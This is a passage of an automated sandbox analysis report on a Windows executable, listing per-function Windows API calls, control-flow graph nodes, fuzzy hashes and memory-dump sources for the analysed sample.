                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA98
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AAB1
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AABB
                      • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9DB
                      • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9F0
                      • Part of subcall function 0040E266: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                      • Part of subcall function 0040E266: memset.MSVCRT ref: 0040E2D1
                    • SetConsoleCtrlHandler.KERNEL32(00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064,00000008,00000008), ref: 0040116F
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 00401BA0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                      • Part of subcall function 00401BA0: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                      • Part of subcall function 00401BA0: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03
                    • HeapDestroy.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011C6
                    • ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011CB
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonConsoleControlsCtrlDestroyEnumExitHandlerInitLoadModuleProcessResourceTypes
                    • String ID: .pA$:pA$|pA
                    • API String ID: 1832782000-3272395972
                    • Opcode ID: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                    • Instruction ID: c3718d3f77f1aa7f822ccfb4f0aafd009571b65037601bc21910cdbb085b96b1
                    • Opcode Fuzzy Hash: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                    • Instruction Fuzzy Hash: 77313271680704A9E200B7B39C47F9E3A18AB1874CF11883FB744790E3DEBC55584A6F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E967
                    • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040ADED
                    • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADFA
                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040AE0C
                    • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040AE19
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AE1E
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                    • String ID: GetLongPathNameW$Kernel32.DLL
                    • API String ID: 1993255246-2943376620
                    • Opcode ID: b269ce3a440ba4175cabcfb75d30ea3c0961c0f40c5e72e3f128e2335a594a21
                    • Instruction ID: e37525813661028bcc8eb249af8eccfe35d88e27d7fdedfae3674fb0e28627f1
                    • Opcode Fuzzy Hash: b269ce3a440ba4175cabcfb75d30ea3c0961c0f40c5e72e3f128e2335a594a21
                    • Instruction Fuzzy Hash: FAF082722452547FC3216BB6AC8CEEB3EACDF86755300443AF905E2251EA7C5D2086BD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1B1
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1F2
                    • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B23C
                    • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040B25E
                    • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040B297
                    • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B2EA
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: File$Create$AllocHeapPointer
                    • String ID:
                    • API String ID: 4207849991-0
                    • Opcode ID: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                    • Instruction ID: 8d8b4ccba24edc48a090e0818cc57ca2d498b7de68d829e88f81714118269cc7
                    • Opcode Fuzzy Hash: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                    • Instruction Fuzzy Hash: D251B171244301ABE3208E15DC49B6BBAE5EB44764F24493EFD81A63E0D779E8458B8D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • EnterCriticalSection.KERNEL32(00418684,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DEDA
                    • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040DF11
                    • LeaveCriticalSection.KERNEL32(00418684,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF6A
                    • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DF7B
                    • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DFB7
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                    • String ID:
                    • API String ID: 1272335518-0
                    • Opcode ID: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                    • Instruction ID: e12e1174ac54fca87ec7e67201d5359a366fc17122bfc308660e030bf91fb77e
                    • Opcode Fuzzy Hash: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                    • Instruction Fuzzy Hash: 90318D71940B069BC3208F95D844A52FBF0FB44720B19C93EE446A77A0DB78E908CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,020A9F70,00000000,00000000), ref: 0040445B
                    • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00404554
                      • Part of subcall function 00402BA6: GetShortPathNameW.KERNEL32(020A9F70,020A9F70,00002710), ref: 00402BE0
                      • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNEL32(020A9F70,020A9F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                      • Part of subcall function 00401E66: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,004045DB,00000000,00000000,00000000,020A9F70,020A8968,00000000,00000000), ref: 00401E9B
                    • SetConsoleCtrlHandler.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,020A9F70,020A8968,00000000,00000000,00000000), ref: 00404636
                      • Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,020A9F70), ref: 004054A5
                      • Part of subcall function 0040548C: EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                      • Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                      • Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                      • Part of subcall function 0040548C: LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$Path$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseConsoleCreateCtrlEnterEnvironmentHandlerLeaveModuleNameObjectQuoteRemoveShortSingleSpacesThreadVariableWaitwcslen
                    • String ID: pA
                    • API String ID: 2577741277-3402996844
                    • Opcode ID: 50ce0f469a7665fb6dfd1afe813213fc97d1f4cade5af18fd151faefa158c23f
                    • Instruction ID: 999f5745f1e250978be3a13d4136388ffeb6a971fca5c6bbec0ef146a0a58392
                    • Opcode Fuzzy Hash: 50ce0f469a7665fb6dfd1afe813213fc97d1f4cade5af18fd151faefa158c23f
                    • Instruction Fuzzy Hash: 4712FAB5504304BED600BBB29C8197F77BCEB89718F10CC3FB544A6192EA3CD9559B2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                    • PathQuoteSpacesW.SHLWAPI(00000000,00000000,020A89E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404626,00000000,00000000,00000000,?), ref: 00403CE6
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    • PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,0041702A,00000000,00000000,00000000,00000000,020A89E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403D1F
                      • Part of subcall function 0040AE75: GetCurrentDirectoryW.KERNEL32(00000104,00000000,00000104,00000000,?,?,0000000A,004037B6,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746), ref: 0040AE8B
                      • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 004098F7: WaitForSingleObject.KERNEL32(020A9F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044), ref: 00409904
                      • Part of subcall function 004098F7: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,020A9F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?), ref: 00409921
                      • Part of subcall function 004056D8: timeBeginPeriod.WINMM(00000001,00403793,00000001,?,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000,00000000), ref: 004056E3
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$AllocateErrorHeapLastPathQuoteSpaces$BeginCurrentDirectoryNamedObjectPeekPeriodPipeSingleWaittimewcslen
                    • String ID: *pA$*pA
                    • API String ID: 2955313036-2893952571
                    • Opcode ID: 6f360bf5818642a08700f897070461880bdab54b83c1be6a7afe69dac29c3c04
                    • Instruction ID: 17d0f5624b42dd18ceef5440812bdbba4c8a787aaabb2d2d00a5c22853b10036
                    • Opcode Fuzzy Hash: 6f360bf5818642a08700f897070461880bdab54b83c1be6a7afe69dac29c3c04
                    • Instruction Fuzzy Hash: 4E41D875104205AAC600BF73DC8293F7669EFD4708F50CD3EB184361E2EA3D9D25AB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                      • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                      • Part of subcall function 00409698: memmove.MSVCRT ref: 004096DA
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                    • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                    • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                    • String ID:
                    • API String ID: 983379767-0
                    • Opcode ID: 85bd719b3417c84e9721a3e665a4c187715772ca533533566ef874ce4e5cb792
                    • Instruction ID: 6d1e308804f6dc32779c3279b2fcfe03024d17212ecc119a6d6b7423f9e5f936
                    • Opcode Fuzzy Hash: 85bd719b3417c84e9721a3e665a4c187715772ca533533566ef874ce4e5cb792
                    • Instruction Fuzzy Hash: C951D7B66052007AE500BBB39D82D7F626DDBC571CB108C3FB440650E3EA3D9D616A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Nodes (id, address range, calls made in the block) and successor edges:
                      848 40b6a0-40b6b4 -> 849, 850
                      849 40b7a7-40b7ad
                      850 40b6ba-40b6be -> 851, 852
                      851 40b6c0-40b6e8 SetFilePointer -> 852
                      852 40b6eb-40b6f5 -> 853, 854
                      853 40b6f7-40b702 -> 855, 856
                      854 40b768-40b773 call 40b0c0 -> 863, 864
                      855 40b753-40b765
                      856 40b704-40b705 -> 858, 859
                      858 40b707-40b70a -> 861, 862
                      859 40b73c-40b750
                      861 40b727-40b739
                      862 40b70c-40b70d -> 865
                      863 40b795-40b7a2 -> 865
                      864 40b775-40b792 WriteFile
                      865 40b711-40b724 memcpy
                    APIs
                    • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B6D8
                    • memcpy.MSVCRT ref: 0040B712
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FilePointermemcpy
                    • String ID:
                    • API String ID: 1104741977-0
                    • Opcode ID: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                    • Instruction ID: c1513f54f6ae5569788c36180188ddc2abd705510cfe10eedfb0010ba837d0d9
                    • Opcode Fuzzy Hash: 02d62d909d0369cf033ef3da9330b5dd6b1d06cd86180aa2b8ba7b2c57c5f325
                    • Instruction Fuzzy Hash: DA312A3A2047019FC320DF29D844E9BB7E5EFD8714F04882EE59A97750D335E919CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Nodes (id, address range, calls made in the block) and successor edges:
                      866 40e900-40e919 TlsGetValue -> 867, 868
                      867 40e924-40e93f -> 869, 870
                      868 40e91b-40e921 -> 867
                      869 40e941-40e972 RtlReAllocateHeap -> 871
                      870 40e974-40e97e -> 871, 872
                      871 40e9bc-40e9dc
                      872 40e980-40e987 -> 873, 874
                      873 40e990-40e9ba HeapReAlloc -> 871
                      874 40e989 -> 873
                    APIs
                    • TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                    • RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E967
                    • HeapReAlloc.KERNEL32(020A0000,00000000,?,000FFFF6), ref: 0040E9B1
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$AllocAllocateValue
                    • String ID:
                    • API String ID: 1566162415-0
                    • Opcode ID: 2f886b1653eeaf8e6e176882be529ab5a4d9cbf2fb84908f11b91f3f387303a9
                    • Instruction ID: 5ee2f831fd0b69a5072d4afb15d4d8d3f7e606a336c6d63425544261b24b472a
                    • Opcode Fuzzy Hash: 2f886b1653eeaf8e6e176882be529ab5a4d9cbf2fb84908f11b91f3f387303a9
                    • Instruction Fuzzy Hash: 35319674A00108EFCB00CF98D594A9DBBF5FB48314F24C1A9E855AB395D731AE51DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Nodes (id, address range, calls made in the block) and successor edges:
                      875 40e560-40e587 TlsGetValue -> 876, 877
                      876 40e5a6-40e5c5 RtlReAllocateHeap -> 878
                      877 40e589-40e5a4 RtlAllocateHeap -> 878
                      878 40e5c7-40e5ed call 40ea40
                    APIs
                    • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                    • RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                    • RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeap$Value
                    • String ID:
                    • API String ID: 2497967046-0
                    • Opcode ID: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                    • Instruction ID: 56fdceb44a62e96a78129ec9cee9786d08dacee7710f0624d62ab86a2b9feb41
                    • Opcode Fuzzy Hash: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                    • Instruction Fuzzy Hash: 6011E974600208FFCB04CF99D894E9ABBB6FF88314F20C569E8099B354D734AA41DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    Nodes (id, address range, calls made in the block) and successor edges:
                      881 40ad45-40ad52 -> 882, 883
                      882 40ad54-40ad86 wcsncpy wcslen -> 885
                      883 40adbd -> 884
                      884 40adbf-40adc2
                      885 40ad9e-40ada6 -> 886, 887
                      886 40ad88-40ad8f -> 888, 889
                      887 40ada8-40adbb CreateDirectoryW -> 884
                      888 40ad91-40ad94 -> 889, 890
                      889 40ad9b -> 885
                      890 40ad96-40ad99 -> 887, 889
                    APIs
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
